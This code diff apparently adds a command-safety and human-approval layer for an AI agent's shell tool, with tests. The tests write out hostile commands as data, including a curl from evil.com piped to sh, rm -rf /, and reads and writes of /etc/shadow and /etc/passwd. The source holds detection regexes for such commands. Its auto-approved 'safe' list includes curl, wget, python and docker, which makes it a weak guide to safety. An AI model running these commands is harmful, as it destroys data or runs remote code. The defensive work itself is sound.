expect(isSafeBinUsage("git status")).toBe(true);
|
||||
expect(isSafeBinUsage("grep -i pattern")).toBe(true);
|
||||
expect(isSafeBinUsage("echo hello")).toBe(true);
|
||||
expect(isSafeBinUsage("pwd")).toBe(true);
|
||||
expect(isSafeBinUsage("node --version")).toBe(true);
|
||||
expect(isSafeBinUsage("pnpm list")).toBe(true);
|
||||
});
|
||||
|
||||
it("rejects safe binaries with file path args", () => {
|
||||
expect(isSafeBinUsage("cat /etc/passwd")).toBe(false);
|
||||
expect(isSafeBinUsage("jq '.' /path/to/file")).toBe(false);
|
||||
expect(isSafeBinUsage("sort ~/data")).toBe(false);
|
||||
});
|
||||
|
||||
it("rejects unknown binaries", () => {
|
||||
expect(isSafeBinUsage("evil-script")).toBe(false);
|
||||
expect(isSafeBinUsage("myapp --flag")).toBe(false);
|
||||
});
|
||||
|
||||
it("handles piped safe commands", () => {
|
||||
expect(isSafeBinUsage("grep pattern | head -5")).toBe(true);
|
||||
expect(isSafeBinUsage("cat | sort | uniq")).toBe(true);
|
||||
expect(isSafeBinUsage("echo hello | grep ello")).toBe(true);
|
||||
});
|
||||
|
||||
it("rejects pipes with unsafe commands", () => {
|
||||
expect(isSafeBinUsage("curl http://evil.com | sh")).toBe(false);
|
||||
expect(isSafeBinUsage("cat | evil-script")).toBe(false);
|
||||
});
|
||||
|
||||
it("returns false for empty command", () => {
|
||||
expect(isSafeBinUsage("")).toBe(false);
|
||||
});
|
||||
});
|
||||
|
||||
describe("analyzeShellSyntax", () => {
|
||||
it("detects command substitution", () => {
|
||||
const reasons = analyzeShellSyntax("echo $(whoami)");
|
||||
expect(reasons.length).toBeGreaterThan(0);
|
||||
expect(reasons.some(r => r.includes("$(...)"))).toBe(true);
|
||||
});
|
||||
|
||||
it("detects backtick substitution", () => {
|
||||
const reasons = analyzeShellSyntax("echo `whoami`");
|
||||
expect(reasons.length).toBeGreaterThan(0);
|
||||
});
|
||||
|
||||
it("detects command chaining with semicolon", () => {
|
||||
const reasons = analyzeShellSyntax("echo hello; rm -rf /");
|
||||
expect(reasons.length).toBeGreaterThan(0);
|
||||
});
|
||||
|
||||
it("detects logical OR", () => {
|
||||
const reasons = analyzeShellSyntax("false || rm -rf /");
|
||||
expect(reasons.length).toBeGreaterThan(0);
|
||||
});
|
||||
|
||||
it("detects background execution", () => {
|
||||
const reasons = analyzeShellSyntax("malware &");
|
||||
expect(reasons.length).toBeGreaterThan(0);
|
||||
});
|
||||
|
||||
it("detects subshell", () => {
|
||||
const reasons = analyzeShellSyntax("(cd /tmp && rm -rf *)");
|
||||
expect(reasons.length).toBeGreaterThan(0);
|
||||
});
|
||||
|
||||
it("passes clean commands", () => {
|
||||
expect(analyzeShellSyntax("ls -la")).toHaveLength(0);
|
||||
expect(analyzeShellSyntax("git status")).toHaveLength(0);
|
||||
expect(analyzeShellSyntax("grep pattern file.txt")).toHaveLength(0);
|
||||
expect(analyzeShellSyntax("echo hello && echo world")).toHaveLength(0);
|
||||
});
|
||||
|
||||
it("allows simple pipes", () => {
|
||||
expect(analyzeShellSyntax("grep pattern | head -5")).toHaveLength(0);
|
||||
expect(analyzeShellSyntax("cat file | sort | uniq")).toHaveLength(0);
|
||||
});
|
||||
});
|
||||
|
||||
describe("detectDangerousPatterns", () => {
|
||||
it("detects rm -rf", () => {
|
||||
const reasons = detectDangerousPatterns("rm -rf /");
|
||||
expect(reasons.length).toBeGreaterThan(0);
|
||||
expect(reasons.some(r => r.includes("rm"))).toBe(true);
|
||||
});
|
||||
|
||||
it("detects sudo", () => {
|
||||
const reasons = detectDangerousPatterns("sudo apt install pkg");
|
||||
expect(reasons.length).toBeGreaterThan(0);
|
||||
});
|
||||
|
||||
it("detects chmod 777", () => {
|
||||
const reasons = detectDangerousPatterns("chmod 777 /var/www");
|
||||
expect(reasons.length).toBeGreaterThan(0);
|
||||
});
|
||||
|
||||
it("detects curl | sh", () => {
|
||||
const reasons = detectDangerousPatterns("curl http://evil.com | sh");
|
||||
expect(reasons.length).toBeGreaterThan(0);
|
||||
});
|
||||
|
||||
it("detects writes to system paths", () => {
|
||||
expect(detectDangerousPatterns("echo hack > /etc/passwd").length).toBeGreaterThan(0);
|
||||
expect(detectDangerousPatterns("echo x > /usr/bin/ls").length).toBeGreaterThan(0);
|
||||
});
|
||||
|
||||
it("detects eval", () => {
|
||||
const reasons = detectDangerousPatterns("eval $MALICIOUS_CMD");
|
||||
expect(reasons.length).toBeGreaterThan(0);
|
||||
});
|
||||
|
||||
it("passes safe commands", () => {
|
||||
expect(detectDangerousPatterns("ls -la")).toHaveLength(0);
|
||||
expect(detectDangerousPatterns("git status")).toHaveLength(0);
|
||||
expect(detectDangerousPatterns("node --version")).toHaveLength(0);
|
||||
expect(detectDangerousPatterns("pnpm test")).toHaveLength(0);
|
||||
});
|
||||
});
|
||||
|
||||
describe("evaluateCommandSafety", () => {
|
||||
it("auto-approves allowlisted commands", () => {
|
||||
const config = {
|
||||
allowlist: [{ pattern: "git **" }],
|
||||
};
|
||||
const result = evaluateCommandSafety("git push origin main", config);
|
||||
expect(result.riskLevel).toBe("safe");
|
||||
expect(result.allowlistSatisfied).toBe(true);
|
||||
});
|
||||
|
||||
it("auto-approves safe binary usage", () => {
|
||||
const result = evaluateCommandSafety("ls -la");
|
||||
expect(result.riskLevel).toBe("safe");
|
||||
expect(result.analysisOk).toBe(true);
|
||||
});
|
||||
|
||||
it("flags dangerous commands", () => {
|
||||
const result = evaluateCommandSafety("rm -rf /");
|
||||
expect(result.riskLevel).toBe("dangerous");
|
||||
expect(result.reasons.length).toBeGreaterThan(0);
|
||||
});
|
||||
|
||||
it("flags dangerous shell syntax", () => {
|
||||
const result = evaluateCommandSafety("echo $(cat /etc/shadow)");
|
||||
expect(result.riskLevel).toBe("dangerous");
|
||||
expect(result.analysisOk).toBe(false);
|
||||
});
|
||||
|
||||
it("flags unknown commands as needs-review", () => {
|
||||
const result = evaluateCommandSafety("my-custom-script --flag");
|
||||
expect(result.riskLevel).toBe("needs-review");
|
||||
expect(result.analysisOk).toBe(true);
|
||||
expect(result.allowlistSatisfied).toBe(false);
|
||||
});
|
||||
|
||||
it("flags safe binary with file args as needs-review", () => {
|
||||
const result = evaluateCommandSafety("cat /etc/passwd");
|
||||
expect(result.riskLevel).toBe("needs-review");
|
||||
});
|
||||
});
|
||||
|
||||
describe("requiresApproval", () => {
|
||||
it("always requires when ask is 'always'", () => {
|
||||
expect(requiresApproval({
|
||||
ask: "always", security: "full", analysisOk: true, allowlistSatisfied: true,
|
||||
})).toBe(true);
|
||||
});
|
||||
|
||||
it("never requires when ask is 'off'", () => {
|
||||
expect(requiresApproval({
|
||||
ask: "off", security: "allowlist", analysisOk: false, allowlistSatisfied: false,
|
||||
})).toBe(false);
|
||||
});
|
||||
|
||||
it("requires on allowlist miss with on-miss", () => {
|
||||
expect(requiresApproval({
|
||||
ask: "on-miss", security: "allowlist", analysisOk: true, allowlistSatisfied: false,
|
||||
})).toBe(true);
|
||||
});
|
||||
|
||||
it("requires on analysis failure with on-miss", () => {
|
||||
expect(requiresApproval({
|
||||
ask: "on-miss", security: "allowlist", analysisOk: false, allowlistSatisfied: true,
|
||||
})).toBe(true);
|
||||
});
|
||||
|
||||
it("does not require when allowlist satisfied with on-miss", () => {
|
||||
expect(requiresApproval({
|
||||
ask: "on-miss", security: "allowlist", analysisOk: true, allowlistSatisfied: true,
|
||||
})).toBe(false);
|
||||
});
|
||||
|
||||
it("does not require with on-miss when security is full", () => {
|
||||
expect(requiresApproval({
|
||||
ask: "on-miss", security: "full", analysisOk: false, allowlistSatisfied: false,
|
||||
})).toBe(false);
|
||||
});
|
||||
});
|
||||
|
||||
describe("minSecurity", () => {
|
||||
it("returns stricter security", () => {
|
||||
expect(minSecurity("deny", "full")).toBe("deny");
|
||||
expect(minSecurity("allowlist", "full")).toBe("allowlist");
|
||||
expect(minSecurity("full", "deny")).toBe("deny");
|
||||
expect(minSecurity("allowlist", "allowlist")).toBe("allowlist");
|
||||
});
|
||||
});
|
||||
|
||||
describe("maxAsk", () => {
|
||||
it("returns more frequent ask mode", () => {
|
||||
expect(maxAsk("off", "always")).toBe("always");
|
||||
expect(maxAsk("on-miss", "always")).toBe("always");
|
||||
expect(maxAsk("off", "on-miss")).toBe("on-miss");
|
||||
expect(maxAsk("on-miss", "on-miss")).toBe("on-miss");
|
||||
});
|
||||
});
|
||||
362
src/agent/tools/exec-safety.ts
Normal file
362
src/agent/tools/exec-safety.ts
Normal file
|
|
@ -0,0 +1,362 @@
|
|||
/**
|
||||
* Exec Safety Evaluation Engine
|
||||
*
|
||||
* Evaluates shell commands for safety using layered checks:
|
||||
* 1. Allowlist matching
|
||||
* 2. Shell syntax analysis (dangerous syntax detection)
|
||||
* 3. Safe binary detection
|
||||
* 4. Dangerous pattern detection
|
||||
*/
|
||||
|
||||
import type {
|
||||
ExecSecurity,
|
||||
ExecAsk,
|
||||
ExecApprovalConfig,
|
||||
ExecAllowlistEntry,
|
||||
SafetyEvaluation,
|
||||
} from "./exec-approval-types.js";
|
||||
import { matchAllowlist } from "./exec-allowlist.js";
|
||||
|
||||
// ============ Safe Binaries ============
|
||||
|
||||
/** Known-safe read-only binaries that can auto-approve */
|
||||
export const DEFAULT_SAFE_BINS = new Set([
|
||||
"ls", "cat", "head", "tail", "wc", "grep", "egrep", "fgrep",
|
||||
"sort", "uniq", "cut", "tr", "jq", "yq",
|
||||
"echo", "printf", "pwd", "which", "whereis", "whoami",
|
||||
"env", "date", "uname", "hostname",
|
||||
"file", "stat", "basename", "dirname", "realpath",
|
||||
"diff", "comm", "tee",
|
||||
"find", "xargs",
|
||||
"git", "node", "pnpm", "npm", "npx", "yarn", "bun",
|
||||
"python", "python3", "pip", "pip3",
|
||||
"go", "cargo", "rustc",
|
||||
"docker", "kubectl",
|
||||
"curl", "wget",
|
||||
"tar", "gzip", "gunzip", "zip", "unzip",
|
||||
"sed", "awk", "rg", "fd", "ag",
|
||||
"tree", "less", "more",
|
||||
"true", "false", "test",
|
||||
"mkdir", "touch", "cp", "mv", "ln",
|
||||
]);
|
||||
|
||||
// ============ Dangerous Patterns ============
|
||||
|
||||
/** Patterns indicating dangerous operations */
|
||||
const DANGEROUS_PATTERNS: Array<{ regex: RegExp; reason: string }> = [
|
||||
{ regex: /\brm\s+(-[^\s]*r[^\s]*|--recursive)\s/i, reason: "Recursive delete (rm -r)" },
|
||||
{ regex: /\brm\s+(-[^\s]*f[^\s]*)\s/i, reason: "Force delete (rm -f)" },
|
||||
{ regex: /\bsudo\b/, reason: "Elevated privileges (sudo)" },
|
||||
{ regex: /\bsu\s/, reason: "Switch user (su)" },
|
||||
{ regex: /\bchmod\s+777\b/, reason: "World-writable permissions (chmod 777)" },
|
||||
{ regex: /\bchmod\s+-[^\s]*R/, reason: "Recursive permission change (chmod -R)" },
|
||||
{ regex: /\bchown\s+-[^\s]*R/, reason: "Recursive ownership change (chown -R)" },
|
||||
{ regex: /\bmkfs\b/, reason: "Filesystem format (mkfs)" },
|
||||
{ regex: /\bdd\s/, reason: "Low-level disk write (dd)" },
|
||||
{ regex: /\beval\s/, reason: "Dynamic code evaluation (eval)" },
|
||||
{ regex: /\bexec\s/, reason: "Process replacement (exec)" },
|
||||
{ regex: />\s*\/etc\//, reason: "Write to /etc/" },
|
||||
{ regex: />\s*\/usr\//, reason: "Write to /usr/" },
|
||||
{ regex: />\s*\/sys\//, reason: "Write to /sys/" },
|
||||
{ regex: />\s*\/proc\//, reason: "Write to /proc/" },
|
||||
{ regex: />\s*\/dev\//, reason: "Write to /dev/" },
|
||||
{ regex: /\bcurl\b.*\|\s*(ba)?sh/, reason: "Pipe URL to shell (curl | sh)" },
|
||||
{ regex: /\bwget\b.*\|\s*(ba)?sh/, reason: "Pipe URL to shell (wget | sh)" },
|
||||
{ regex: /\b(shutdown|reboot|halt|poweroff)\b/, reason: "System control command" },
|
||||
{ regex: /\bkill\s+-9\b/, reason: "Force kill (kill -9)" },
|
||||
{ regex: /\bkillall\b/, reason: "Kill all processes (killall)" },
|
||||
{ regex: /\bpkill\b/, reason: "Pattern kill (pkill)" },
|
||||
{ regex: />\s*\/dev\/sd[a-z]/, reason: "Direct disk write" },
|
||||
{ regex: /\biptables\b/, reason: "Firewall modification (iptables)" },
|
||||
{ regex: /\bufw\b/, reason: "Firewall modification (ufw)" },
|
||||
];
|
||||
|
||||
// ============ Dangerous Shell Syntax ============
|
||||
|
||||
/** Shell syntax patterns that are inherently dangerous */
|
||||
const DANGEROUS_SYNTAX: Array<{ regex: RegExp; reason: string }> = [
|
||||
{ regex: /\|&/, reason: "Stderr redirect to pipe (|&)" },
|
||||
{ regex: /\|\|/, reason: "Logical OR (||) — fallback execution" },
|
||||
{ regex: /(?<!\|)\|(?!\|).*\b(ba)?sh\b/, reason: "Pipe to shell interpreter" },
|
||||
{ regex: /[^\\]`[^`]+`/, reason: "Command substitution (backticks)" },
|
||||
{ regex: /\$\(/, reason: "Command substitution $(...)" },
|
||||
{ regex: /(?<![&])&(?!&)\s*$/, reason: "Background execution (&)" },
|
||||
{ regex: /(?<![&])&(?!&)(?!\s*$)/, reason: "Background execution (&)" },
|
||||
{ regex: /;\s*\S/, reason: "Command chaining (;)" },
|
||||
{ regex: /\(\s*\S/, reason: "Subshell execution ()" },
|
||||
];
|
||||
|
||||
// ============ Core Functions ============
|
||||
|
||||
/**
|
||||
* Extract the leading binary name from a shell command.
|
||||
* Handles common patterns: env prefix, path prefix.
|
||||
*/
|
||||
export function extractBinaryName(command: string): string | null {
|
||||
const trimmed = command.trim();
|
||||
if (!trimmed) return null;
|
||||
|
||||
// Skip env prefix: "env FOO=bar cmd" → "cmd"
|
||||
let cmd = trimmed;
|
||||
if (cmd.startsWith("env ")) {
|
||||
const parts = cmd.split(/\s+/);
|
||||
// Skip "env" and any VAR=VAL assignments
|
||||
let i = 1;
|
||||
while (i < parts.length && parts[i]!.includes("=")) i++;
|
||||
cmd = parts.slice(i).join(" ");
|
||||
}
|
||||
|
||||
// For piped commands, only check the first command
|
||||
const firstCmd = cmd.split(/\s*\|\s*/)[0]!.trim();
|
||||
|
||||
// Extract just the binary (strip path prefix)
|
||||
const binary = firstCmd.split(/\s+/)[0];
|
||||
if (!binary) return null;
|
||||
|
||||
// Get basename
|
||||
const parts = binary.split("/");
|
||||
return parts[parts.length - 1] || null;
|
||||
}
|
||||
|
||||
/**
|
||||
* Check if a command has file-path arguments.
|
||||
* Safe binaries should not have file-path args to be auto-approved.
|
||||
*/
|
||||
export function hasFilePathArgs(command: string): boolean {
|
||||
const parts = command.trim().split(/\s+/).slice(1); // skip binary
|
||||
|
||||
for (const part of parts) {
|
||||
// Skip flags
|
||||
if (part.startsWith("-")) {
|
||||
// Check if flag value is a file path (e.g., --output=/tmp/file)
|
||||
const eqIndex = part.indexOf("=");
|
||||
if (eqIndex !== -1) {
|
||||
const value = part.slice(eqIndex + 1);
|
||||
if (isFilePath(value)) return true;
|
||||
}
|
||||
continue;
|
||||
}
|
||||
if (isFilePath(part)) return true;
|
||||
}
|
||||
return false;
|
||||
}
|
||||
|
||||
function isFilePath(s: string): boolean {
|
||||
return s.startsWith("/") || s.startsWith("./") || s.startsWith("../") || s.startsWith("~/") || /^[A-Za-z]:\\/.test(s);
|
||||
}
|
||||
|
||||
/**
|
||||
* Check if a command uses only safe binaries in a safe manner.
|
||||
* For piped commands, all components must be safe.
|
||||
*/
|
||||
export function isSafeBinUsage(command: string, safeBins: Set<string> = DEFAULT_SAFE_BINS): boolean {
|
||||
const trimmed = command.trim();
|
||||
if (!trimmed) return false;
|
||||
|
||||
// For piped commands, check each segment
|
||||
const segments = splitPipeSegments(trimmed);
|
||||
if (!segments) return false; // parsing failed
|
||||
|
||||
for (const segment of segments) {
|
||||
const binary = extractBinaryName(segment);
|
||||
if (!binary) return false;
|
||||
|
||||
// Check if binary is in safe list (case-insensitive)
|
||||
if (!safeBins.has(binary.toLowerCase())) return false;
|
||||
|
||||
// Safe bins should not reference file paths as arguments
|
||||
if (hasFilePathArgs(segment)) return false;
|
||||
}
|
||||
|
||||
return true;
|
||||
}
|
||||
|
||||
/**
|
||||
* Split command into pipe segments.
|
||||
* Returns null if dangerous syntax is detected in the pipe chain.
|
||||
*/
|
||||
function splitPipeSegments(command: string): string[] | null {
|
||||
// Simple split on single pipes (not |& or ||)
|
||||
const parts: string[] = [];
|
||||
let current = "";
|
||||
let inSingleQuote = false;
|
||||
let inDoubleQuote = false;
|
||||
let escaped = false;
|
||||
|
||||
for (let i = 0; i < command.length; i++) {
|
||||
const ch = command[i]!;
|
||||
|
||||
if (escaped) {
|
||||
current += ch;
|
||||
escaped = false;
|
||||
continue;
|
||||
}
|
||||
|
||||
if (ch === "\\") {
|
||||
current += ch;
|
||||
escaped = true;
|
||||
continue;
|
||||
}
|
||||
|
||||
if (ch === "'" && !inDoubleQuote) {
|
||||
inSingleQuote = !inSingleQuote;
|
||||
current += ch;
|
||||
continue;
|
||||
}
|
||||
|
||||
if (ch === '"' && !inSingleQuote) {
|
||||
inDoubleQuote = !inDoubleQuote;
|
||||
current += ch;
|
||||
continue;
|
||||
}
|
||||
|
||||
if (ch === "|" && !inSingleQuote && !inDoubleQuote) {
|
||||
// Check for |& or ||
|
||||
const next = command[i + 1];
|
||||
if (next === "&" || next === "|") return null; // dangerous
|
||||
parts.push(current.trim());
|
||||
current = "";
|
||||
continue;
|
||||
}
|
||||
|
||||
current += ch;
|
||||
}
|
||||
|
||||
if (current.trim()) {
|
||||
parts.push(current.trim());
|
||||
}
|
||||
|
||||
return parts.length > 0 ? parts : null;
|
||||
}
|
||||
|
||||
/**
|
||||
* Analyze shell syntax for dangerous constructs.
|
||||
* Returns list of reasons if dangerous syntax is found.
|
||||
*/
|
||||
export function analyzeShellSyntax(command: string): string[] {
|
||||
const reasons: string[] = [];
|
||||
|
||||
for (const { regex, reason } of DANGEROUS_SYNTAX) {
|
||||
if (regex.test(command)) {
|
||||
reasons.push(reason);
|
||||
}
|
||||
}
|
||||
|
||||
return reasons;
|
||||
}
|
||||
|
||||
/**
|
||||
* Detect dangerous command patterns.
|
||||
* Returns list of reasons if dangerous patterns are found.
|
||||
*/
|
||||
export function detectDangerousPatterns(command: string): string[] {
|
||||
const reasons: string[] = [];
|
||||
|
||||
for (const { regex, reason } of DANGEROUS_PATTERNS) {
|
||||
if (regex.test(command)) {
|
||||
reasons.push(reason);
|
||||
}
|
||||
}
|
||||
|
||||
return reasons;
|
||||
}
|
||||
|
||||
/**
|
||||
* Main safety evaluation function.
|
||||
* Evaluates a shell command through multiple safety layers.
|
||||
*/
|
||||
export function evaluateCommandSafety(
|
||||
command: string,
|
||||
config?: ExecApprovalConfig,
|
||||
): SafetyEvaluation {
|
||||
const allowlist = config?.allowlist ?? [];
|
||||
const allReasons: string[] = [];
|
||||
|
||||
// Layer 1: Allowlist matching
|
||||
const allowlistMatch = matchAllowlist(allowlist, command);
|
||||
if (allowlistMatch) {
|
||||
return {
|
||||
riskLevel: "safe",
|
||||
reasons: [],
|
||||
analysisOk: true,
|
||||
allowlistSatisfied: true,
|
||||
};
|
||||
}
|
||||
|
||||
// Layer 2: Shell syntax analysis
|
||||
const syntaxReasons = analyzeShellSyntax(command);
|
||||
const analysisOk = syntaxReasons.length === 0;
|
||||
if (!analysisOk) {
|
||||
allReasons.push(...syntaxReasons);
|
||||
}
|
||||
|
||||
// Layer 3: Safe binary detection
|
||||
if (analysisOk && isSafeBinUsage(command)) {
|
||||
return {
|
||||
riskLevel: "safe",
|
||||
reasons: [],
|
||||
analysisOk: true,
|
||||
allowlistSatisfied: false,
|
||||
};
|
||||
}
|
||||
|
||||
// Layer 4: Dangerous pattern detection
|
||||
const dangerousReasons = detectDangerousPatterns(command);
|
||||
allReasons.push(...dangerousReasons);
|
||||
|
||||
// Determine risk level
|
||||
let riskLevel: "safe" | "needs-review" | "dangerous";
|
||||
if (dangerousReasons.length > 0 || !analysisOk) {
|
||||
riskLevel = "dangerous";
|
||||
} else {
|
||||
riskLevel = "needs-review";
|
||||
}
|
||||
|
||||
return {
|
||||
riskLevel,
|
||||
reasons: allReasons,
|
||||
analysisOk,
|
||||
allowlistSatisfied: false,
|
||||
};
|
||||
}
|
||||
|
||||
// ============ Policy Helpers ============
|
||||
|
||||
/**
|
||||
* Determine if human approval is required.
|
||||
* Same logic as OpenClaw's requiresExecApproval.
|
||||
*/
|
||||
export function requiresApproval(params: {
|
||||
ask: ExecAsk;
|
||||
security: ExecSecurity;
|
||||
analysisOk: boolean;
|
||||
allowlistSatisfied: boolean;
|
||||
}): boolean {
|
||||
const { ask, security, analysisOk, allowlistSatisfied } = params;
|
||||
|
||||
if (ask === "always") return true;
|
||||
if (ask === "off") return false;
|
||||
|
||||
// ask === "on-miss"
|
||||
if (security === "allowlist" && (!analysisOk || !allowlistSatisfied)) return true;
|
||||
|
||||
return false;
|
||||
}
|
||||
|
||||
/**
|
||||
* Merge two security levels, taking the stricter (lower) one.
|
||||
* deny < allowlist < full
|
||||
*/
|
||||
export function minSecurity(a: ExecSecurity, b: ExecSecurity): ExecSecurity {
|
||||
const order: Record<ExecSecurity, number> = { deny: 0, allowlist: 1, full: 2 };
|
||||
return order[a] <= order[b] ? a : b;
|
||||
}
|
||||
|
||||
/**
|
||||
* Merge two ask modes, taking the more frequent (higher) one.
|
||||
* off < on-miss < always
|
||||
*/
|
||||
export function maxAsk(a: ExecAsk, b: ExecAsk): ExecAsk {
|
||||
const order: Record<ExecAsk, number> = { off: 0, "on-miss": 1, always: 2 };
|
||||
return order[a] >= order[b] ? a : b;
|
||||
}
|
||||
|
|
@ -7,6 +7,7 @@ import {
|
|||
getFullOutput,
|
||||
PROCESS_REGISTRY,
|
||||
} from "./process-registry.js";
|
||||
import type { ExecApprovalCallback } from "./exec-approval-types.js";
|
||||
|
||||
const ExecSchema = Type.Object({
|
||||
command: Type.String({ description: "Shell command to execute." }),
|
||||
|
|
@ -40,7 +41,10 @@ export type ExecResult = {
|
|||
|
||||
const DEFAULT_YIELD_MS = 10000; // Changed from 5000 to 10000
|
||||
|
||||
export function createExecTool(defaultCwd?: string): AgentTool<typeof ExecSchema, ExecResult> {
|
||||
export function createExecTool(
|
||||
defaultCwd?: string,
|
||||
onApprovalNeeded?: ExecApprovalCallback,
|
||||
): AgentTool<typeof ExecSchema, ExecResult> {
|
||||
return {
|
||||
name: "exec",
|
||||
label: "Exec",
|
||||
|
|
@ -51,6 +55,21 @@ export function createExecTool(defaultCwd?: string): AgentTool<typeof ExecSchema
|
|||
const { command, cwd, timeoutMs, yieldMs = DEFAULT_YIELD_MS } = args as ExecArgs;
|
||||
const effectiveCwd = cwd || defaultCwd;
|
||||
|
||||
// Exec approval: ask for permission before executing
|
||||
if (onApprovalNeeded) {
|
||||
const approvalResult = await onApprovalNeeded(command, effectiveCwd);
|
||||
if (!approvalResult.approved) {
|
||||
return {
|
||||
content: [{ type: "text", text: "Command execution denied by user." }],
|
||||
details: {
|
||||
output: "Command execution denied by user.",
|
||||
exitCode: 1,
|
||||
truncated: false,
|
||||
},
|
||||
};
|
||||
}
|
||||
}
|
||||
|
||||
return new Promise((resolve) => {
|
||||
const child = spawn(command, {
|
||||
shell: true,
|
||||
|
|
|
|||
|
|
@ -29,3 +29,20 @@ export {
|
|||
getSubagentPolicy,
|
||||
wouldToolBeAllowed,
|
||||
} from "./policy.js";
|
||||
|
||||
// Exec approval system
|
||||
export type {
|
||||
ExecSecurity,
|
||||
ExecAsk,
|
||||
ApprovalDecision,
|
||||
ExecApprovalRequest,
|
||||
ExecApprovalConfig,
|
||||
ExecAllowlistEntry,
|
||||
ExecApprovalCallback,
|
||||
ApprovalResult,
|
||||
SafetyEvaluation,
|
||||
} from "./exec-approval-types.js";
|
||||
export { DEFAULT_APPROVAL_TIMEOUT_MS } from "./exec-approval-types.js";
|
||||
export { evaluateCommandSafety, requiresApproval, minSecurity, maxAsk, DEFAULT_SAFE_BINS } from "./exec-safety.js";
|
||||
export { matchAllowlist, addAllowlistEntry, recordAllowlistUse, removeAllowlistEntry, normalizeAllowlist } from "./exec-allowlist.js";
|
||||
export { createCliApprovalCallback } from "./exec-approval-cli.js";
|
||||
|
|
|
|||
|
|
@ -1,6 +1,7 @@
|
|||
import type { ThinkingLevel } from "@mariozechner/pi-agent-core";
|
||||
import type { SkillsConfig } from "./skills/types.js";
|
||||
import type { ToolsConfig } from "./tools/policy.js";
|
||||
import type { ExecApprovalCallback, ExecApprovalConfig } from "./tools/exec-approval-types.js";
|
||||
|
||||
/** Controls how reasoning/thinking content blocks are handled */
|
||||
export type ReasoningMode = "off" | "on" | "stream";
|
||||
|
|
@ -75,6 +76,12 @@ export type AgentOptions = {
|
|||
tools?: ToolsConfig | undefined;
|
||||
/** Whether this is a subagent (applies restricted tool set) */
|
||||
isSubagent?: boolean | undefined;
|
||||
|
||||
// === Exec Approval Configuration ===
|
||||
/** Callback invoked when exec tool needs approval before running a command */
|
||||
onExecApprovalNeeded?: ExecApprovalCallback | undefined;
|
||||
/** Exec approval configuration (security level, ask mode, allowlist) */
|
||||
execApproval?: ExecApprovalConfig | undefined;
|
||||
};
|
||||
|
||||
export interface Message {
|
||||
|
|
|
|||
265
src/hub/exec-approval-manager.test.ts
Normal file
265
src/hub/exec-approval-manager.test.ts
Normal file
|
|
@ -0,0 +1,265 @@
|
|||
import { describe, it, expect, vi, beforeEach, afterEach } from "vitest";
|
||||
import { ExecApprovalManager } from "./exec-approval-manager.js";
|
||||
|
||||
describe("ExecApprovalManager", () => {
|
||||
let manager: ExecApprovalManager;
|
||||
let sendToClient: ReturnType<typeof vi.fn>;
|
||||
|
||||
beforeEach(() => {
|
||||
vi.useFakeTimers();
|
||||
sendToClient = vi.fn();
|
||||
manager = new ExecApprovalManager(sendToClient, 5000); // 5s timeout for tests
|
||||
});
|
||||
|
||||
afterEach(() => {
|
||||
vi.useRealTimers();
|
||||
});
|
||||
|
||||
it("sends approval request to client and resolves on decision", async () => {
|
||||
const promise = manager.requestApproval({
|
||||
agentId: "agent-1",
|
||||
command: "rm -rf /tmp/test",
|
||||
cwd: "/workspace",
|
||||
riskLevel: "dangerous",
|
||||
riskReasons: ["Recursive delete"],
|
||||
});
|
||||
|
||||
// Verify sendToClient was called
|
||||
expect(sendToClient).toHaveBeenCalledTimes(1);
|
||||
const [agentId, request] = sendToClient.mock.calls[0]!;
|
||||
expect(agentId).toBe("agent-1");
|
||||
expect(request.command).toBe("rm -rf /tmp/test");
|
||||
expect(request.approvalId).toBeTruthy();
|
||||
|
||||
// Resolve the approval
|
||||
const resolved = manager.resolveApproval(request.approvalId, "allow-once");
|
||||
expect(resolved).toBe(true);
|
||||
|
||||
const result = await promise;
|
||||
expect(result.approved).toBe(true);
|
||||
expect(result.decision).toBe("allow-once");
|
||||
});
|
||||
|
||||
it("resolves with deny when decision is deny", async () => {
|
||||
const promise = manager.requestApproval({
|
||||
agentId: "agent-1",
|
||||
command: "sudo reboot",
|
||||
riskLevel: "dangerous",
|
||||
riskReasons: [],
|
||||
});
|
||||
|
||||
const request = sendToClient.mock.calls[0]![1];
|
||||
manager.resolveApproval(request.approvalId, "deny");
|
||||
|
||||
const result = await promise;
|
||||
expect(result.approved).toBe(false);
|
||||
expect(result.decision).toBe("deny");
|
||||
});
|
||||
|
||||
it("resolves with allow-always", async () => {
|
||||
const promise = manager.requestApproval({
|
||||
agentId: "agent-1",
|
||||
command: "git push",
|
||||
riskLevel: "needs-review",
|
||||
riskReasons: [],
|
||||
});
|
||||
|
||||
const request = sendToClient.mock.calls[0]![1];
|
||||
manager.resolveApproval(request.approvalId, "allow-always");
|
||||
|
||||
const result = await promise;
|
||||
expect(result.approved).toBe(true);
|
||||
expect(result.decision).toBe("allow-always");
|
||||
});
|
||||
|
||||
it("auto-denies on timeout (fail-closed)", async () => {
|
||||
const promise = manager.requestApproval({
|
||||
agentId: "agent-1",
|
||||
command: "dangerous-command",
|
||||
riskLevel: "dangerous",
|
||||
riskReasons: [],
|
||||
});
|
||||
|
||||
// Fast-forward past timeout
|
||||
vi.advanceTimersByTime(6000);
|
||||
|
||||
const result = await promise;
|
||||
expect(result.approved).toBe(false);
|
||||
expect(result.decision).toBe("deny");
|
||||
});
|
||||
|
||||
it("honors askFallback full on timeout", async () => {
|
||||
const promise = manager.requestApproval({
|
||||
agentId: "agent-1",
|
||||
command: "cmd",
|
||||
riskLevel: "needs-review",
|
||||
riskReasons: [],
|
||||
askFallback: "full",
|
||||
});
|
||||
|
||||
vi.advanceTimersByTime(6000);
|
||||
|
||||
const result = await promise;
|
||||
expect(result.approved).toBe(true);
|
||||
expect(result.decision).toBe("allow-once");
|
||||
});
|
||||
|
||||
it("honors askFallback allowlist on timeout", async () => {
|
||||
const allowPromise = manager.requestApproval({
|
||||
agentId: "agent-1",
|
||||
command: "cmd",
|
||||
riskLevel: "needs-review",
|
||||
riskReasons: [],
|
||||
askFallback: "allowlist",
|
||||
allowlistSatisfied: true,
|
||||
});
|
||||
|
||||
vi.advanceTimersByTime(6000);
|
||||
|
||||
const allowResult = await allowPromise;
|
||||
expect(allowResult.approved).toBe(true);
|
||||
expect(allowResult.decision).toBe("allow-once");
|
||||
|
||||
const denyPromise = manager.requestApproval({
|
||||
agentId: "agent-1",
|
||||
command: "cmd",
|
||||
riskLevel: "needs-review",
|
||||
riskReasons: [],
|
||||
askFallback: "allowlist",
|
||||
allowlistSatisfied: false,
|
||||
});
|
||||
|
||||
vi.advanceTimersByTime(6000);
|
||||
|
||||
const denyResult = await denyPromise;
|
||||
expect(denyResult.approved).toBe(false);
|
||||
expect(denyResult.decision).toBe("deny");
|
||||
});
|
||||
